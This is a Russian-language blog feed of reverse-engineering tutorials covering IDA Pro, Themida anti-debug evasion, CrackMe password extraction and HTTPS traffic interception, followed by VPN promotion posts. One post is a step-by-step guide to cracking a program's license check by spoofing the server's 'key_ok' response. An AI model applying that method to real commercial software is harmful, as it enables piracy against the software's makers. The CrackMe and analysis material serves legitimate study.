  <p id="dsYc" data-align="center">1. Загрузка файла<br />При загрузке бинарного файла IDA Pro проводит анализ, включая:<br />- <strong>Автоопределение формата</strong>: IDA может определить тип файла (например, PE, ELF, Mach-O) и архитектуру (x86, x64, ARM и т. д.).<br />- <strong>Процесс инициализации</strong>: IDA выполняет начальный анализ кода, идентифицируя функции, строки и данные. Это может занять время, в зависимости от размера бинарника.</p>
  <p id="NRLi" data-align="center">2. Основные интерфейсы и навигация<br />- <strong>Дизассемблер</strong>: Основное окно, отображающее дизассемблированный код. Код представлен в виде команд, каждая из которых имеет адрес и сопутствующую информацию.<br />- <strong>Код-граф</strong>: Позволяет визуально анализировать потоки управления в функциях. Можно перемещаться по графу, чтобы понять, как функции взаимосвязаны.<br />- <strong>Функции и дерево функций:</strong> Список всех функций, найденных в бинаре. Вы можете отсортировать их по имени, адресу и размеру.</p>
  <p id="PxTb" data-align="center">3. Анализ и редактирование кода<br />- <strong>Переименование</strong>: Вероятно, самая полезная функция. Вы можете переименовать функции и переменные, чтобы сделать их более понятными. Используйте &#x60;N&#x60; для переименования.<br />- <strong>Аннотации и комментарии</strong>: Вы можете добавлять комментарии к строкам кода и функциям, нажимая &#x60;;&#x60;. Это помогает запомнить детали анализа.<br />- <strong>Переходы</strong>: Используйте &#x60;Enter&#x60; для перехода к определённым адресам, функциям или данным, что облегчает навигацию.</p>
  <p id="sTKw" data-align="center">4. Исследование данных<br />- <strong>Строки</strong>: При нажатии на &#x60;Shift + F12&#x60;, вы можете увидеть все текстовые строки, содержащиеся в файле. Это может помочь в поиске значимых строк (например, URL, ключей и т. д.).<br />- <strong>Данные и структуры</strong>: IDA Pro позволяет исследовать структуры данных, используя &#x60;Ctrl + S&#x60; для создания пользовательских структур.</p>
  <p id="xMqe" data-align="center">5. Плагины и скрипты<br />- <strong>Скрипты</strong>: IDA Pro поддерживает Python и IDC для написания скриптов. Это позволяет автоматизировать задачи, такие как анализ функции или манипуляция с данными.<br />- <strong>Плагины</strong>: Существует множество уже готовых плагинов, которые добавляют функции, такие как дополнительный анализ, экспортирование данных или улучшенные графические представления.</p>
  <p id="3PO0" data-align="center">6. Инструменты анализа<br />- <strong>Типизация данных</strong>: IDA Pro поддерживает типизацию данных, что позволяет вам задавать типы для переменных и структур, что повышает читаемость анализа.<br />- <strong>Фантомные функции</strong>: Создание &quot;фантомных&quot; функций для упрощения навигации и анализа.</p>
  <p id="BcmL" data-align="center">7. Экспорт и отчетность<br />- <strong>Сохранение работы</strong>: Работы можно сохранять в проект IDA, однако также можно экспортировать результаты анализа в XML, HTML или текстовые форматы.<br />- <strong>Отчёты</strong>: IDA может генерировать отчёты, содержащие полную информацию о функциях, графах и стримах.</p>
  <p id="U9Da" data-align="center">8. Уголовный анализ и совместимость<br />- <strong>Группировка функций</strong>: Функции можно группировать по категориям, например, по типам операций (например, обработка строк, работа с файлами и т. д.).<br />- <strong>Совместимость с другими инструментами</strong>: IDA Pro может интегрироваться с другими инструментами для реверс-инжиниринга и анализа, такими как Ghidra, Radare2 и другими.</p>
  <p id="GhWL" data-align="center">9. Дополнительные возможности<br />- <strong>IDAPython</strong>: Позволяет расширять функциональность IDA Pro с помощью Python. Вы можете создавать сложные скрипты для выполнения анализов и автоматизации.<br />- <strong>MDI интерфейс</strong>: Поддержка многодокументного интерфейса позволяет одновременно открывать несколько проектов или файлов.</p>
  <p id="koLi" data-align="center">10. Документация и ресурсы<br />- IDA Pro предоставляет встроенные справочные материалы и документацию, которая подробно объясняет все функции и возможности. Также доступны многочисленные учебные пособия и видео на YouTube и специализированных форумах.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@metasteall/reverse2</guid><link>https://teletype.in/@metasteall/reverse2?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/reverse2?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>Как Обойти Themida protect</title><pubDate>Wed, 14 Aug 2024 08:20:13 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/c2/05/c2050ea9-df64-4d8b-babc-62d8cd1432a7.png"></media:content><category>reverse</category><description><![CDATA[<img src="https://img4.teletype.in/files/fe/5d/fe5d042d-9c64-46c5-b808-8a8f7c16680f.jpeg"></img>Themida — это мощное программное обеспечение для защиты, которое использует множество методов анти-дебаггирования для предотвращения реверс-инжиниринга своих защищенных приложений. В этой статье рассмотрим некоторые подходы к обходу системы анти-дебаггера Themida.]]></description><content:encoded><![CDATA[
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="0gy9" data-align="center">Введение</h2>
  </section>
  <p id="hsPZ">Themida — это мощное программное обеспечение для защиты, которое использует множество методов анти-дебаггирования для предотвращения реверс-инжиниринга своих защищенных приложений. В этой статье рассмотрим некоторые подходы к обходу системы анти-дебаггера Themida.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="yBkj" data-align="center">Подготовка</h2>
  </section>
  <p id="qhmg">1. **Инструменты**: Убедитесь, что у вас установлены необходимые инструменты, такие как отладчик (например, x64dbg), дизассемблер (например, IDA Pro) и инструменты для модификации исполняемых файлов.</p>
  <p id="FxdC"><br />2. **Цель**: Найдите защищенное приложение, желательно CrackMe, чтобы тренироваться в обходе защиты.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="L9IF" data-align="center">Шаг 1: Анализ Защищенного Приложения</h2>
  </section>
  <p id="2Hrr">1. Запустите защищенное приложение в отладчике.</p>
  <p id="XPV6"><br />2. Обратите внимание на сообщения об ошибках, связанные с дебаггингом или обнаружением отладчиков. Themida может завершить процесс, если он запущен в отладчике.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="IyJW" data-align="center">Шаг 2: Использование Патчей</h2>
  </section>
  <p id="54Wo">1. Используйте инструменты, такие как ScyllaHide или TitanHide, чтобы скрыть факт дебаггирования. Эти инструменты могут скрыть ваш отладчик от Themida.</p>
  <p id="gTfs"><br />2. Вы также можете попробовать изменить код самостоятельно, отключив проверки на наличие отладчика, удалив или модифицируя соответствующие инструкции в коде.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="iPh3" data-align="center">Шаг 3: Усреднение Проверок</h2>
  </section>
  <p id="rUiH">1. Themida использует множество методов для проверки наличия отладчика, таких как проверки системных функций и проверка состояния регистров.</p>
  <p id="LyF8"><br />2. Запустите программу и найдите функции, ответственные за эти проверки. Как правило, они основаны на системных вызовах, таких как &#x60;IsDebuggerPresent&#x60; или &#x60;CheckRemoteDebuggerPresent&#x60;. Вы можете изменить поведения этих функций, подменив их на NOP-операции или новые функции.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="VGWs" data-align="center">Шаг 4: Изучение Механизмов Защиты</h2>
  </section>
  <p id="buhJ">1. Themida использует защиту на уровне кода, которая может включать обфускацию и динамическую подмену функций.</p>
  <p id="ScP2"><br />2. По мере изучения программы ищите участки кода, которые могут вызывать проверки. Это можно сделать с помощью дизассемблера, изучая потоки выполнения.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="EoWF" data-align="center">Шаг 5: Модификация Стековых Фреймов</h2>
  </section>
  <p id="cCYY">1. Иногда используют методы, такие как управление стеком, для обхода защит. Это может включать удаление или изменение значений с помощью отладчика.</p>
  <p id="wwnG"><br />2. Используйте возможности отладчика, чтобы изменить значения регистров или стека в процессе выполнения.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@metasteall/reverse</guid><link>https://teletype.in/@metasteall/reverse?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/reverse?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>Как Получить Пароль из Программы CrackMe с Помощью X64dbg</title><pubDate>Wed, 14 Aug 2024 08:16:01 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/c2/05/c2050ea9-df64-4d8b-babc-62d8cd1432a7.png"></media:content><category>reverse</category><description><![CDATA[<img src="https://img4.teletype.in/files/fe/5d/fe5d042d-9c64-46c5-b808-8a8f7c16680f.jpeg"></img>CrackMe — это небольшие программы, предназначенные для тренировки навыков реверс-инжиниринга. В данной статье мы рассмотрим, как использовать X64dbg для извлечения пароля из программы CrackMe. X64dbg — это мощный отладчик для Windows, который позволяет анализировать и модифицировать исполняемые файлы.]]></description><content:encoded><![CDATA[
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="E3Ym" data-align="center">Введение</h2>
  </section>
  <p id="skFY">CrackMe — это небольшие программы, предназначенные для тренировки навыков реверс-инжиниринга. В данной статье мы рассмотрим, как использовать X64dbg для извлечения пароля из программы CrackMe. X64dbg — это мощный отладчик для Windows, который позволяет анализировать и модифицировать исполняемые файлы.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="3Myu" data-align="center">Необходимые Инструменты</h2>
  </section>
  <p id="FPHA">- X64dbg: бесплатный инструмент для реверс-инжиниринга, доступный для Windows.<br />- Программа CrackMe: убедитесь, что у вас есть исполняемый файл CrackMe, который вы хотите проанализировать.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="Yyqm" data-align="center">Шаг 1: Установка и Настройка X64dbg</h2>
  </section>
  <p id="Ppyl">1. Скачайте последнюю версию X64dbg с официального сайта.<br />2. Разархивируйте загруженный файл в удобное место.<br />3. Запустите x64dbg.exe (для 64-битной программы) или x32dbg.exe (для 32-битной).</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="eaVq" data-align="center">Шаг 2: Загрузка Программы CrackMe</h2>
  </section>
  <p id="SFxu">1. В X64dbg выберите в меню File → Open и загрузите файл CrackMe.<br />2. После загрузки программы вы увидите интерфейс отладчика с отображением кода и регистров.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="FN9n" data-align="center">Шаг 3: Определение Точки Остановки</h2>
  </section>
  <p id="mKnv">1. Запустите приложение, нажав F9 или выбрав Run из меню.<br />2. Найдите входную точку программы. Обычно это функция main.<br />3. Перейдите в область кода, где происходит проверка пароля. Обычно это условие, сравнивающее введенный пароль со строкой.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="v3j6" data-align="center">Шаг 4: Установка Точки Остановки на Проверку Пароля</h2>
  </section>
  <p id="LdmE">1. Когда вы дойдете до кода, в котором происходит проверка пароля, установите точку останова, дважды кликнув по инструкции.<br />2. Это позволит вам остановиться перед сравнением пароля.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="VHLr" data-align="center">Шаг 5: Выполнение Отладки и Получение Пароля</h2>
  </section>
  <p id="KrmM">1. Запустите программу снова (F9). Введите неправильный пароль, чтобы достичь точки останова.<br />2. Как только программа остановится, исследуйте регистры и стек.<br />3. Смотрите на указатели в регистрах, таких как RDI, RSI или RDX. Часто пароль хранится в строке или переменной.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="WczW" data-align="center">Шаг 6: Считывание Пароля</h2>
  </section>
  <p id="YxRX">1. Если пароль представлен в виде строки, скопируйте его с помощью контекстного меню.<br />2. Вы можете изменить значение регистра или памяти, чтобы обойти проверку пароля.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@metasteall/hacktraffik</guid><link>https://teletype.in/@metasteall/hacktraffik?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/hacktraffik?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>Подмена Трафика для Анализа Программного Обеспечения</title><pubDate>Wed, 14 Aug 2024 08:10:09 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/c2/05/c2050ea9-df64-4d8b-babc-62d8cd1432a7.png"></media:content><category>reverse</category><description><![CDATA[<img src="https://img4.teletype.in/files/fe/5d/fe5d042d-9c64-46c5-b808-8a8f7c16680f.jpeg"></img>Обратная разработка (reverse engineering) — это мощный инструмент, позволяющий исследовать и анализировать программное обеспечение для понимания его внутренней структуры, принципов работы и функциональных особенностей. Одним из наиболее эффективных методов в этом процессе является подмена трафика. Этот подход позволяет производить анализ взаимодействия между клиентом и сервером, выявлять уязвимости и исследовать скрытые функции приложений. В данной статье мы подробно рассмотрим, как осуществить подмену трафика на примере анализа HTTPS трафика.]]></description><content:encoded><![CDATA[
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="Ne9M" data-align="center">Введение</h2>
  </section>
  <p id="o71l">Обратная разработка (reverse engineering) — это мощный инструмент, позволяющий исследовать и анализировать программное обеспечение для понимания его внутренней структуры, принципов работы и функциональных особенностей. Одним из наиболее эффективных методов в этом процессе является подмена трафика. Этот подход позволяет производить анализ взаимодействия между клиентом и сервером, выявлять уязвимости и исследовать скрытые функции приложений. В данной статье мы подробно рассмотрим, как осуществить подмену трафика на примере анализа HTTPS трафика.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="zYQj" data-align="center">Шаг 1: Выбор Инструментов</h2>
  </section>
  <p id="oLXr">Для успешной подмены трафика вам понадобятся определенные инструменты. Рассмотрим наиболее популярные из них:</p>
  <p id="kC4n">- **Fiddler**: Инструмент для перехвата и анализа HTTP(S) трафика, который поддерживает множество платформ и позволяет отлаживать веб-запросы.<br />- **Charles Proxy**: Мощный прокси-сервер, способный перехватывать HTTPS трафик, анализировать запросы и изменять их в реальном времени.<br />- **Burp Suite**: Профессиональный инструмент в области безопасности веб-приложений, который включает в себя функции перехвата трафика, модификации запросов и тестирования уязвимостей.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="TZ6A" data-align="center">Шаг 2: Настройка Прокси</h2>
  </section>
  <p id="olEz">Установите выбранный инструмент и произведите необходимые настройки:</p>
  <p id="hkyS">Настройка Fiddler или Charles<br />1. Запустите выбранный инструмент.<br />2. Настройте устройство (например, браузер или мобильное приложение) на использование прокси-сервера. Обычно это делается через параметры сети, указывая адрес &#x60;localhost&#x60; и порт, например, &#x60;8888&#x60;.<br />3. Для перехвата HTTPS-трафика необходимо импортировать корневой сертификат прокси на устройство:<br />   - В Fiddler: выберите &#x60;Tools&#x60; → &#x60;Options&#x60; → &#x60;HTTPS&#x60; и установите галочку на &#x60;Decrypt HTTPS traffic&#x60;.<br />   - В Charles: выберите &#x60;Help&#x60; → &#x60;SSL Proxying&#x60; → &#x60;Install Charles Root Certificate&#x60;.</p>
  <p id="2phK">Настройка Wireshark<br />Wireshark — это инструмент для глубокого анализа сетевого трафика, который позволяет видеть пакеты на более низком уровне. Просто запустите его и выберите интерфейс, с которого будете перехватывать данные.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="BoId" data-align="center">Шаг 3: Анализ Трафика</h2>
  </section>
  <p id="e2pb">Запустите программу, которую хотите проанализировать, и начните перехват трафика. Внимательно изучайте:</p>
  <p id="zeL9">- **Методы запросов**: GET, POST, PUT и другие.<br />- **Параметры запросов**: данные, передаваемые через URL и тело запроса.<br />- **Заголовки**: ключевые поля, такие как &#x60;Authorization&#x60;, &#x60;User-Agent&#x60;, &#x60;Content-Type&#x60;, которые могут содержать полезную информацию.<br />- **Ответы**: изучите структуру получаемых данных, чтобы понять, как приложение обрабатывает запросы и какие данные возвращает.</p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="J0qx" data-align="center">Шаг 4: Подмена Запросов</h2>
  </section>
  <p id="g0ct">С помощью вашего инструмента вы можете модифицировать запросы и подменять их в реальном времени:</p>
  <p id="b5fw">1. **Изменение параметров запроса**: Подменяйте значения параметров, чтобы протестировать, как приложение реагирует на невалидные или измененные данные.<br />2. **Изменение заголовков**: Экспериментируйте с заголовками, меняя токены аутентификации или версии API, чтобы проверить, как это повлияет на ответ сервера.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@metasteall/reverse_engineering</guid><link>https://teletype.in/@metasteall/reverse_engineering?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/reverse_engineering?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>Как крякнуть программу с подменой траффика</title><pubDate>Tue, 13 Aug 2024 08:45:37 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/c2/05/c2050ea9-df64-4d8b-babc-62d8cd1432a7.png"></media:content><category>reverse</category><description><![CDATA[<img src="https://img4.teletype.in/files/fe/5d/fe5d042d-9c64-46c5-b808-8a8f7c16680f.jpeg"></img>Введём неверный ключ и видим ссылку на сайт где происходит проверка]]></description><content:encoded><![CDATA[
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="F3ck" data-align="center">Всем привет, сегодня я расскажу как крякнуть программу с подменой траффика.</h2>
  </section>
  <h2 id="y6Sw" data-align="center">Что нам нужно для этого?</h2>
  <h3 id="4pdu" data-align="center">HTTP DEBUGER / FIDDLER EVERYWHERE</h3>
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="dB6j" data-align="center">Приступаем!</h2>
  </section>
  <h3 id="L77e" data-align="center">1. Анализируем траффик</h3>
  <p id="E86D" data-align="center"><strong>Введём неверный ключ и видим ссылку на сайт где происходит проверка</strong></p>
  <figure id="g8xz" class="m_original">
    <img src="https://img3.teletype.in/files/a8/29/a8296f0d-c47a-4764-9a45-ecc3f7baebe0.png" width="967" />
  </figure>
  <h3 id="tBsc" data-align="center">Перейдем по ссылке и увидим ответ</h3>
  <figure id="y9hG" class="m_original">
    <img src="https://img1.teletype.in/files/04/8a/048a9c41-d1ca-4e13-888f-294a875c2918.png" width="273" />
  </figure>
  <p id="KlLb" data-align="center"><strong>Теперь введём верный ключ</strong></p>
  <figure id="xjGF" class="m_original">
    <img src="https://img3.teletype.in/files/a9/94/a994dd50-eda9-41a8-bc4b-2ce40bc97eba.png" width="973" />
  </figure>
  <h3 id="3ZS1" data-align="center">Снова перейдем по ссылке и увидим новый ответ(key_ok)</h3>
  <figure id="nDSe" class="m_original">
    <img src="https://img2.teletype.in/files/d8/41/d8415796-7461-4387-ab5c-cc8bcef13abc.png" width="165" />
  </figure>
  <h2 id="BH63" data-align="center">2. Работа с HTTP Debugger</h2>
  <h3 id="QCjt" data-align="center">Нажимаем на наш ключ и делаем автоматическую замену ответа</h3>
  <figure id="nFM3" class="m_original">
    <img src="https://img4.teletype.in/files/f8/f4/f8f42c6e-0270-43d9-9cb7-3bffa2e61f8e.png" width="952" />
  </figure>
  <h3 id="iZnh" data-align="center">Далее:</h3>
  <figure id="a4Tz" class="m_original">
    <img src="https://img2.teletype.in/files/11/f8/11f88471-902b-46ff-a0db-c195da0efa71.png" width="417" />
  </figure>
  <h3 id="0FrV" data-align="center">Нажимаем кнопку &quot;Save&quot;</h3>
  <figure id="WH8Z" class="m_original">
    <img src="https://img3.teletype.in/files/61/72/6172f08a-83c4-416d-a6e9-95bd8047ec96.png" width="524" />
  </figure>
  <h2 id="JrVz" data-align="center">Поздравляю! Вы успешно крякнули программу!</h2>
  <p id="E1DH"></p>
  <section style="background-color:hsl(hsl(236, 74%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="WePb" data-align="center">Если хотите гайд как крякнуть Roblox чит (Wave) с помощью Fiddler, ставьте лайки и на 10 лайков будет туториал!</h2>
  </section>
  <p id="63fk"></p>
  <h2 id="5ZPy"></h2>
  <section style="background-color:hsl(hsl(323, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="0wtB" data-align="center">Вся предоставленная информация носит исключительно ознакомительный характер и не является руководством к действиям описанными в данном гайде.</h2>
  </section>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@metasteall/freevpnserver</guid><link>https://teletype.in/@metasteall/freevpnserver?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/freevpnserver?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>Как бесплатно обойти блокировку Youtube?</title><pubDate>Tue, 13 Aug 2024 08:22:02 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/44/1c/441cd8b8-7e4f-48f1-a2ea-95c34a6fe902.png"></media:content><category>VPN</category><description><![CDATA[<img src="https://img4.teletype.in/files/70/9e/709eedc5-14f5-4d21-a714-14faef294228.jpeg"></img>]]></description><content:encoded><![CDATA[
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="GU7C" data-align="center">Всем привет! Сегодня я вам расскажу как бесплатно получить VPN сервер для обхода блокировки Youtube и прочих сервисов!</h2>
  </section>
  <h2 id="oZHy" data-align="center">1. Подписываемся на <a href="https://t.me/metashop_win" target="_blank">Telegram канал(t.me/metashop_win)</a></h2>
  <h2 id="J1Jw" data-align="center">2. После подписки пишем <a href="https://t.me/metasteall" target="_blank">администратору(@metasteall)</a></h2>
  <h2 id="er9U" data-align="center">3. Получаем VPN сервер и инструкцию по установке! </h2>
  <h2 id="yoHG" data-align="center">4. Наслаждаемся высоко-скоростным VPN&#x27;ом!</h2>
  <figure id="5mZT" class="m_original">
    <img src="https://img3.teletype.in/files/af/1f/af1f049d-69ad-4e58-85ce-ba011d530f68.png" width="685" />
  </figure>
  <p id="cX1m" data-align="center"><strong>Буду благодарен любому донату за предоставленный мною способ!</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@metasteall/metashop</guid><link>https://teletype.in/@metasteall/metashop?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/metashop?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>Инструкция по использованию и настройке VPN серверов.</title><pubDate>Mon, 29 Jul 2024 19:22:36 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/6e/ba/6ebac539-2b9d-4810-b6c2-b35eb35c4f2f.png"></media:content><description><![CDATA[<img src="https://img3.teletype.in/files/a5/bb/a5bb9605-bc0e-457d-8ba1-d80f6120080a.jpeg"></img>Приветствуем !
По любым вопросам касательно работы нашего VPN, вы можете обратиться в нашу поддержку.]]></description><content:encoded><![CDATA[
  <p id="A2it" data-align="center">Приветствуем !<br />По любым вопросам касательно работы нашего VPN, вы можете обратиться в нашу <a href="https://t.me/metasteall" target="_blank">поддержку</a>.</p>
  <h3 id="7EQg" data-align="center"><strong>настройка VPN для мобильных устройств:</strong></h3>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <ol id="Ydr5">
      <li id="NbWy">Скачайте и установите на устройство приложение:<br /><a href="https://apps.apple.com/ru/app/streisand/id6450534064" target="_blank">Streisand (iOS)</a> | <a href="https://play.google.com/store/apps/details?id=moe.nb4a" target="_blank">NekoBox (Android)</a></li>
    </ol>
    <p id="6yff">    2. Скопируйте выданный Config</p>
    <ol id="v1MA">
      <li id="HaDf">Откройте приложение для вашего устройства. Нажмите на «+», далее выберите пункт добавить из буфера (iOS) или &quot;Импорт из буфера обмена&quot; (Android).</li>
    </ol>
  </section>
  <h3 id="cbNn" data-align="center"><strong>Настройка VPN на ПК Windows / MacOS:</strong></h3>
  <section style="background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <ol id="CNEE">
      <li id="pVLq">Скачайте и установите на устройство приложение <a href="https://github.com/2dust/v2rayN/releases/download/6.45/v2rayN-With-Core.zip" target="_blank">V2RayN - (Windows)</a> | <a href="https://apps.apple.com/ru/app/foxray/id6448898396" target="_blank">FoXray - (MacOS)</a></li>
    </ol>
    <p id="RIg2">    2.Скопируйте выданный Config</p>
    <p id="geUD">    3.Откройте приложение для вашего устройства и импортируйте Config. (см.   фотографии ниже на примере V2RayN)</p>
  </section>
  <figure id="CTWJ" class="m_original">
    <img src="https://img4.teletype.in/files/36/f1/36f1b495-48a7-4570-b665-13005f92a162.png" width="372" />
  </figure>
  <figure id="zWIG" class="m_original">
    <img src="https://img2.teletype.in/files/da/c7/dac7018c-eb5e-40cb-a190-779e314c990e.png" width="866" />
  </figure>
  <figure id="YFnH" class="m_original">
    <img src="https://img2.teletype.in/files/18/e9/18e98689-ef72-4b75-aba8-aa8fb5b3c20b.png" width="873" />
  </figure>
  <p id="AEsB"></p>
  <figure id="HF1x" class="m_original" data-caption-align="center">
    <img src="https://img3.teletype.in/files/e3/99/e399ede8-826c-4f0e-9640-7fa3cba94a8c.png" width="270" />
  </figure>
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h3 id="NQaq" data-align="center">После выбора языка, обязательно полностью перезагрузите приложение!</h3>
  </section>
  <figure id="ZuFw" class="m_original">
    <img src="https://img2.teletype.in/files/d9/c0/d9c0ec0d-6e36-4cfc-a47c-a1b025bfb229.png" width="887" />
  </figure>
  <figure id="rI3D" class="m_original">
    <img src="https://img2.teletype.in/files/dc/69/dc698e0d-4f72-481a-ae3a-143c0e377e78.png" width="535" />
  </figure>
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="Ixm2" data-align="center">Заходим в трей (мелкие значки). Кликаем ПКМ по программе и ставим значение как &quot;Установить как системный сервер&quot;</p>
  </section>
  <figure id="DoaS" class="m_original">
    <img src="https://img4.teletype.in/files/b6/66/b666fdac-361d-4ffc-a4de-02bfa43818cd.png" width="476" />
  </figure>
  <section style="background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="nmW6" data-align="center"><strong>Результат!</strong></h2>
  </section>
  <figure id="8MrF" class="m_original">
    <img src="https://img3.teletype.in/files/af/1f/af1f049d-69ad-4e58-85ce-ba011d530f68.png" width="685" />
  </figure>
  <section style="background-color:hsl(hsl(0,   0%,  var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h2 id="HSTs" data-align="center">Если VPN плохо работает либо вообще не работает, попробуйте включить &quot;Режим VPN&quot;</h2>
  </section>

]]></content:encoded></item></channel></rss>